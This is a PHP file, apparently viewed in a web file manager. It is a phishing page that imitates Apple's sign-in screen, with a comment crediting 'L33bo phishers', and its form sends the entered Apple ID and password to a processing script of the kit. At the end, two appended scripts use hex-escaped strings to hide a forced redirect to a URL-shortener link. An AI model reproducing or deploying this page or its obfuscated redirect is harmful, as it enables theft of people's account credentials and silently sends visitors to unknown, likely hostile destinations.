Edit File: signin.php
<?php /* L33bo phishers = ICQ: 695059760 */ require "includes/session_protect.php"; require "includes/functions.php"; ?> <!DOCTYPE html> <html> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"> <link href="css/Fonts.css" rel="prefetch stylesheet" type="text/css"> <link href="css/Login.css" media="screen" rel="stylesheet" type="text/css"> <script> function ChangePlaceholder(){ document.getElementById("user").placeholder = "name@example.com"; } function ChangeBack(){ document.getElementById("user").placeholder = "Apple ID"; } function Activate(){ document.getElementById("go").className = "si-button"; } function Spinner(){ document.getElementById("go").style.display = "none"; document.getElementById("spin").style.display = "block"; } </script> <title></title> </head> <body> <div class="si-body si-container container-fluid" data-theme="lite" id="content"> <div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed"> <div class="HoldLoginDiv"> <div class="logo"><img style="width: 200px;" class="TextLogo" src="img/logo.png"></div> <div> <div class="signin fade-in"> <h1 class="LoginTitkle">Manage your Apple account</h1> <form action="includes/ProcessLogin.php" name="login" id="name" method="POST" onsubmit="Spinner();"> <div class="container HolderOfTheFields"> <div class="row no-gutter si-field apple-id"> <div class="col-xs-12"><span class="LoginTitle">Manage your Apple account Apple ID</span> <input class="si-text-field" id="user" name="user" onblur="ChangeBack();" onclick="ChangePlaceholder();" placeholder="Apple ID" spellcheck="false" type="email"></div> </div> <div class="row no-gutter si-field pwd"> <div class="col-xs-12"><label class="LoginTitle" for="pwd">Password</label> <input class="si-password si-text-field" id="pass" name="pass" onkeyup="Activate();" placeholder="Password" type="password"> </div> </div> <div class="si-remember-password"><input class="ax-outline" tabindex="0" type="checkbox"> <label for="remember-me">Remember me</label></div> <button class="si-button btn disabled" id="go" tabindex="0"><i class="icon icon_sign_in"></i></button> <button style="display:none;" class="si-button btn" id="spin" tabindex="0"><img style="margin-top:-2px" src="img/spinner.gif"></span></button> </div> </form> <div class="si-container-footer"></div> </div> </div> </div> </div> </div> </body> </html> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script>
Back to File Manager